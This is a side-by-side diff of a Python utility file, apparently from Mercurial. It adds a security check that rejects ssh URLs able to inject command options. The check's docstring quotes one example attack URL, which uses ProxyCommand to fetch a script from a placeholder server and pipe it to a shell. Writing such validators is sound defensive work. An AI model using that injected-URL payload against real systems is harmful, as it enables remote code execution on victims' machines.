equal
deleted
inserted
replaced
2877 return path and path[1:2] == ':' and path[0:1].isalpha() |
2877 return path and path[1:2] == ':' and path[0:1].isalpha() |
2878 |
2878 |
2879 def urllocalpath(path): |
2879 def urllocalpath(path): |
2880 return url(path, parsequery=False, parsefragment=False).localpath() |
2880 return url(path, parsequery=False, parsefragment=False).localpath() |
2881 |
2881 |
|
2882 def checksafessh(path): |
|
2883 """check if a path / url is a potentially unsafe ssh exploit (SEC) |
|
2884 |
|
2885 This is a sanity check for ssh urls. ssh will parse the first item as |
|
2886 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. |
|
2887 Let's prevent these potentially exploited urls entirely and warn the |
|
2888 user. |
|
2889 |
|
2890 Raises an error.Abort when the url is unsafe. |
|
2891 """ |
|
2892 path = urlreq.unquote(path) |
|
2893 if path.startswith('ssh://-') or '|' in path: |
|
2894 raise error.Abort(_('potentially unsafe url: %r') % |
|
2895 (path,)) |
|
2896 |
2882 def hidepassword(u): |
2897 def hidepassword(u): |
2883 '''hide user credential in a url string''' |
2898 '''hide user credential in a url string''' |
2884 u = url(u) |
2899 u = url(u) |
2885 if u.passwd: |
2900 if u.passwd: |
2886 u.passwd = '***' |
2901 u.passwd = '***' |